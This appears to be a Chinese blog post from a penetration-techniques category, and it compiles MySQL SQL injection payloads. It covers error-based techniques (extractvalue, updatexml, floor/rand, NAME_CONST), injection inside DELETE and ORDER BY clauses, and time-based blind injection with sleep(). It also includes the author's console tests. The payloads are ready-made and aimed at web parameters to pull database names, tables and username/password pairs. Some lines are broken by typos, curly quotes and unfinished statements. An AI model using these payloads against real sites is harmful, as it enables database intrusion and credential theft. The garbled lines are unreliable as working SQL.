您当前位置: 首页 » 渗透技巧 » sql报错注入语句汇总(自己整理的)

sql报错注入语句汇总(自己整理的)

2017年1月25日 | 发表评论(0) 查看评论

一、extractvalue
www.vuln-web.com/index.php?view=-35″ union select 1,2,3,4,5–
www.vuln-web.com/index.php?view=-35″ and extractvalue(0x0a,concat(0x0a,(select database())))–
www.vuln-web.com/index.php?view=-35″ and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))–
www.vuln-web.com/index.php?view=-35″ and extractvalue(0x0a,concat(0x0a,(select column_name from information_schema.columns where table_schema=database() and table_name=’users’ limit 0,1)))–
www.vuln-web.com/index.php?view=-35″ and extractvalue(0x0a,concat(0x0a,(select count(username,0x3a,password) from users limit 0,1)))–


二、updatexml
www.vuln-web.com/index.php?view=-35″ union select 1,2,3,4,5–
www.vuln-web.com/index.php?view=-35″ and updatexml(null,concat(0x3a,(0x0a,(select database()))),null)–
http://127.0.0.1//report.php?id=1-111%27%20and%20updatexml(null,concat(0x3a,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1)),null)–+
www.vuln-web.com/index.php?view=-35″ and updatexml(null,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name=’users’ limit 0,1)),null)–
www.vuln-web.com/index.php?view=-35″ and updatexml(null,concat(0x3a,(select count(username) from users)),null)–
www.vuln-web.com/index.php?view=-35″ and updatexml(null,concat(0x3a,(select count(username,0x3a,password) from users limit 0,1)),null)–
三、floor
版本号:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
Method1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’
Method2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

mysql> SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT ‘x’))a from information_schema.tables group by a)b;
ERROR 1062 (23000): Duplicate entry ‘1x’ for key ‘group_key’

四、低版本
http://127.0.0.1//report.php?id=1-111%27%20and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)–+
五、
原型:www.vuln-web.com/photo.php?id=1′ and (select 1 from (Select count(*),Concat((<Your Query here to return single row>),0x3a,floor(rand (0) *2))y from information_schema.tables group by y) x)– –
www.vuln-web.com/photo.php?id=1′ and (select 1 from (Select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)– –
www.vuln-web.com/photo.php?id=1′ and (select 1 from (Select count(*),Concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)– –
www.vuln-web.com/photo.php?id=1′ and (select 1 from (Select count(*),Concat((select column_name from information_schema.columns where table_schema=database() and table_name='<table_name_here>’ limit 0,1),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)– –
www.vuln-web.com/photo.php?id=1′ and (select 1 from (Select count(*),Concat((select concat(<column_1>,<column_2>) from <table_name_here> limit 0,1),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)– –

六、delete
delete from products where product_id=” or extractvalue(0x0a,concat(0x0a,(select database()))) and ”=”
delete from products where product_id=”” or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) and “”=”” and password=’$passwrd’ limit 0,1
七、time-baseed injection
www.vuln-web.com/photo.php?id=1′ and (select sleep(10) from dual where database() like ‘_____’)# 利用_确定数据库长度
www.vuln-web.com/photo.php?id=1′ and (select sleep(10) from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like ‘%pass%’ limit 0,1) like ‘%’)# 表名
www.vuln-web.com/photo.php?id=1′ and (select sleep(10) from dual where (select column_name from information_schema.columns where table_schema=database() and table_name=’users’ and column_name like ‘%username%’ limit 0,1) like ‘%’)# 字段
www.vuln-web.com/photo.php?id=1′ and (select sleep(10) from dual where (select password from users wehre username like ‘%admin%’ limit 0,1) like ‘%’)# 内容

——————-自己的测试
mysql> select * from is_num where id=’1112′ and (select sleep(10) from dual wher
e database() like ‘%’)#’;
-> ;
Empty set (10.00 sec)

mysql> select * from is_num where id=’1112′ and (select sleep(10) from dual wher
e database() like ‘_’);#’;
Empty set (0.00 sec)

mysql> select * from is_num where id=’1112′ and (select sleep(10) from dual wher
e database() like ‘____’);#’;
Empty set (10.00 sec)

mysql> select * from is_num where id=’1112′ and 1=(select length(database())=4);
#’;
+——+——+——+
| id | type | test |
+——+——+——+
| 1112 | NULL | NULL |
+——+——+——+
1 row in set (0.00 sec)

mysql> select * from is_num where id=’1112′ and 1=(select length(database())=3);
#’;
Empty set (0.00 sec)

mysql> select * from is_num where id=’1112′ and 1=(select length(database())=2);
#’;
Empty set (0.00 sec)

mysql> select * from is_num where id=’1112′ and 1=(select length(database())=4);
#’;
+——+——+——+
| id | type | test |
+——+——+——+
| 1112 | NULL | NULL |
+——+——+——+
1 row in set (0.00 sec)

mysql> select * from is_num where id=’1112′ and 1=(select sleep(10) from dual wh
ere length(database())=4);#’;
Empty set (10.00 sec)

mysql> select * from is_num where id=’1112′ and 1=(select sleep(10) from dual wh
ere length(database())=42);#’;
Empty set (0.00 sec)

———————————————————————————

八.order by && group by后注入点
select posts from content where submit=1 order by 1,extractvalue(0x0a,concat(0x0a,(select database())))# 爆库名
select posts from content where submit=1 order by 1,(select case when (1=1) then 1 else 1*(select table_name from information_schema.tables)end)=1# 1=1正常
select posts from content where submit=1 order by 1,(select case when (1=2) then 1 else 1*(select table_name from information_schema.tables)end)=1# 1=2错误
select posts from content where submit=1 order by 1,(select sleep(10) from dual where database() like database())# 时间盲注
select posts from content where submit=1 order by 1,
select posts from content where submit=1 order by 1,

分类:

渗透技巧

| 标签: